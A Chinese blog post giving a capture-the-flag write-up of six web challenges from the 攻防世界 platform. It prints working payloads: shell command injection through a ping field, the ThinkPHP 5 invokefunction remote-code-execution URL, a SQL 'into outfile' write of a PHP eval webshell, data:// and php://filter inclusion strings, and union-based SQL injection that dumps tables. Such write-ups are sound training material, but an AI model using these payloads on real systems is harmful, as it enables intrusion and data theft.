【攻防世界WEB】难度二星6分:webshell、command_execution、xff_referer、php

举报
黑色地带(崛起) 发表于 2023/01/28 00:26:56 2023/01/28
1.3k+ 0 0
【摘要】 【攻防世界WEB】难度二星6分:webshell、command_execution、xff_referer、php

前言:

介绍: 

博主:网络安全领域狂热爱好者。

殊荣:华为云博主、CSDN网络安全领域优质创作者(CSDN:黑色地带(崛起)),2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。


导读:

面向读者:对于网络安全方面的学者。


 目录

一、webshell

解题方法:

过程

二、command_execution

解题方法:

过程

三、xff_referer

解题方法:

过程

四、php_rce

解题方法:

过程:

五、Web_php_include

解题方法:

过程1:

过程2:

六、NewsCenter

解题方法:

过程


一、webshell

编辑

解题方法:

1、使用蚁剑(菜刀、冰蝎)进行连接

 知识点:

中国蚁剑使用,及修改蚁剑特征 https://blog.csdn.net/qq_53079406/article/details/123302775?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165840515916782184690711%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165840515916782184690711&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-123302775-null-null.185%5Ev2%5Econtrol&utm_term=%E8%9A%81%E5%89%91&spm=1018.2226.3001.4450

过程

知道URL,知道密码

编辑


连接
编辑

双击进去URL看见flag了

编辑

 编辑



二、command_execution

编辑

解题方法:

1、ping夹带系统命令执行

过程

可能存在命令执行漏洞,在ping之后夹带了系统命令

127.0.0.1;ls /

(ping自己主机,并查看目录)

编辑


使用find(全局查找)函数查找flag,并获得其路径

/home/flag.txt

编辑


获取文件内容

127.0.0.1;cat /home/flag.txt

编辑



三、xff_referer

编辑

解题方法:

1、伪造ip和网站来源

过程

bp拦截请求

编辑

添加X-Forwarded-For

123.123.123.123

然后放包

编辑

提示:必须来自https://www.google.com

编辑


添加referer

https://www.google.com

再放包

编辑


编辑



四、php_rce

编辑

解题方法:

1、查看robots.txt文件

过程:

寻找ThinkPHP V5利用工具

编辑


利用已知漏洞,如

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=后面接命令

……


利用漏洞寻找工具

环境python2.7

编辑

 编辑

编辑


查看目录(可以往根目录一直查)

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

编辑


http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../../

编辑


 可以直接全局查找

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

编辑


查看内容

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

编辑




五、Web_php_include

编辑

解题方法:

1、写入一句话木马,后连接

2、使用php伪协议

过程1:

扫描到后台

编辑

不需要尝试爆破,因为密码为空

编辑


查询参数secure-file-priv

show variables like "secure_file_priv";

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的编辑

 就可以上传一句话木马上去了

select "<?php eval($_POST['1']); ?>"into outfile '/tmp/1.php'

编辑


 连接到一句话木马编辑编辑

 编辑

过程2:

data://用来执行PHP代码

?page=data://text/plain,<?php system("ls")?>

也可将要执行的命令进行base64加密

?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
编辑


php://filter用于读取源码

http://61.147.171.105:51359?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
编辑

 对其进行解码

编辑



六、NewsCenter

编辑

解题方法:

1、SQL注入

过程

有输入框,可能是存在注入点了

编辑


 可以使用acunetix等工具对URL进行漏扫

可以看到SQL盲注

编辑


接下来可以手工,也可以用sqlmap跑

可以判断出字段数位3;且回显位为2,3

1' union select 1,2,3#

1' union select 1,2,3,4#(报错)

编辑

爆库

1' union select 1,database(),user()#编辑

 爆表

1' union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database() #

编辑

 依次排查每个表中的字段

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='secret_table' #

编辑

 爆数据

1' union select 1,2,(select group_concat(id,0x3a,fl4g) from secret_table) #

编辑


 或者使用sqlmap(我感觉跑起来挺慢的,还没手工快)

【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

作者其他文章

评论(0

抱歉,系统识别当前为高风险访问,暂不支持该操作

    全部回复

    上滑加载中

    设置昵称

    在此一键设置昵称,即可参与社区互动!

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。